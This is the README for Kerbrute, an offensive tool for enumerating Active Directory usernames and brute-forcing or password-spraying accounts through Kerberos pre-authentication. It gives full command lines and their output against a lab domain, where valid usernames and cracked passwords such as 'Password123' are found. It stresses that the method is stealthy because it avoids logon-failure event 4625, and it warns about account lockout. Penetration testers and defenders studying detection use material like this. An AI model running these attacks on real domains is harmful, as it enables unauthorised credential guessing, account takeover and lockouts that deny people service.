Kerbrute

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the Heimdal Kerberos client from Linux. I wanted something that didn’t require privileges to install a Kerberos client, and when I found the amazing pure Go implementation of Kerberos gokrb5, I decided to finally learn Go and write this.

Bruteforcing Windows passwords with Kerberos is much faster than any other approach I know of, and potentially stealthier since pre-authentication failures do not trigger that “traditional” An account failed to log on event 4625. With Kerberos, you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller)

Usage

Kerbrute has three main commands:

• bruteuser – Bruteforce a single user’s password from a wordlist
• passwordspray – Test a single password against a list of users
• usernenum – Enumerate valid domain usernames via Kerberos

A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given the KDC will be looked up via DNS.

By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option.

The output is logged to stdout, but a log file can be specified with -o.

By default, failures are not logged, but that can be changed with -v.

Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts.

User Enumeration

To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. However, if the KDC prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures so it will not lock out any accounts. This generates a Windows event ID 4768 if Kerberos logging is enabled.

root@kali:~# ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt



    __             __               __

   / /_____  _____/ /_  _______  __/ /____

  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \

 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/

/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/



Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop



2019/03/06 21:28:04 >  Using KDC(s):

2019/03/06 21:28:04 >   pdc01.lab.ropnop.com:88



2019/03/06 21:28:04 >  [+] VALID USERNAME:       amata@lab.ropnop.com

2019/03/06 21:28:04 >  [+] VALID USERNAME:       thoffman@lab.ropnop.com

2019/03/06 21:28:04 >  Done! Tested 1001 usernames (2 valid) in 0.425 seconds

Password Spray

With passwordwpray, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this does will increment the failed login count and lock out accounts. This will generate both event IDs 4768 – A Kerberos authentication ticket (TGT) was requested and 4771 – Kerberos pre-authentication failed

root@kali:~# ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123



    __             __               __

   / /_____  _____/ /_  _______  __/ /____

  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \

 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/

/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/



Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop



2019/03/06 21:37:29 >  Using KDC(s):

2019/03/06 21:37:29 >   pdc01.lab.ropnop.com:88



2019/03/06 21:37:35 >  [+] VALID LOGIN:  callen@lab.ropnop.com:Password123

2019/03/06 21:37:37 >  [+] VALID LOGIN:  eshort@lab.ropnop.com:Password123

2019/03/06 21:37:37 >  Done! Tested 2755 logins (2 successes) in 7.674 seconds

Brute User

This is a traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy! This will generate both event IDs 4768 – A Kerberos authentication ticket (TGT) was requested and 4771 – Kerberos pre-authentication failed

root@kali:~# ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman



    __             __               __

   / /_____  _____/ /_  _______  __/ /____

  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \

 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/

/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/



Version: dev (43f9ca1) - 03/06/19 - Ronnie Flathers @ropnop



2019/03/06 21:38:24 >  Using KDC(s):

2019/03/06 21:38:24 >   pdc01.lab.ropnop.com:88



2019/03/06 21:38:27 >  [+] VALID LOGIN:  thoffman@lab.ropnop.com:Summer2017

2019/03/06 21:38:27 >  Done! Tested 1001 logins (1 successes) in 2.711 seconds

Download

Copyright (C) 2019 ropnop